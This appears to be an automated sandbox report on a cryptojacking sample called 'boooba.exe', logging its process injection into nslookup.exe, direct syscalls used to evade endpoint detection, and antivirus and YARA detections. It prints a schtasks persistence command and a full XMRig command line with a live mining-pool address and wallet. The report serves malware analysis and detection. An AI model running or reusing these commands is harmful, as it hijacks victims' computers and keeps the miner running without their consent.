Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Thread created: C:\Windows\System32\conhost.exe EIP: 65300000	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtCreateThreadEx: Direct from: 0x401A17	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtWriteVirtualMemory: Direct from: 0x401D57	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtProtectVirtualMemory: Direct from: 0x401DD7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	NtAllocateVirtualMemory: Direct from: 0x401D97	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A			Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\conhost.exe	Thread register set: target process: 6288			Jump to behavior
Source: C:\Windows\System32\conhost.exe	Thread register set: target process: 5480			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\boooba.exe	Memory written: C:\Windows\System32\conhost.exe base: 15759250000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory written: C:\Windows\System32\conhost.exe base: 13CA14E0000	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E311770000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 59CFC77010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Memory written: C:\Windows\System32\conhost.exe base: 29965300000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140367000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140753000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140775000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140776000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140777000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140779000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077B000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077C000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14077D000	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Memory written: C:\Windows\System32\nslookup.exe base: 26087A5010	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\boooba.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe	Jump to behavior
Source: C:\Users\user\IOAshdohSha.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\nslookup.exe

Code function: 12_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_000000014031010C

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
212.47.253.124	unknown	France		12876	OnlineSASFR	true

Contacted Domains

Name	IP	Active
xmr-eu1.nanopool.org	51.15.58.224	true

AV Detection

Antivirus / Scanner detection for submitted sample

Source: boooba.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\IOAshdohSha.exe	Avira: detection malicious, Label: HEUR/AGEN.1344202

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\IOAshdohSha.exe	ReversingLabs: Detection: 71%

Multi AV Scanner detection for submitted file

Source: boooba.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\IOAshdohSha.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: boooba.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR

DNS related to crypt mining pools

Source: unknown

DNS query: name: xmr-eu1.nanopool.org

Detected Stratum mining protocol

Source: global traffic	TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.

Found strings related to Crypto-Mining

Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Networking

Uses nslookup.exe to query domains

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100	Jump to behavior

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 212.47.253.124 212.47.253.124

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: OnlineSASFR OnlineSASFR

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49731 -> 212.47.253.124:10300

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: xmr-eu1.nanopool.org

Source: conhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
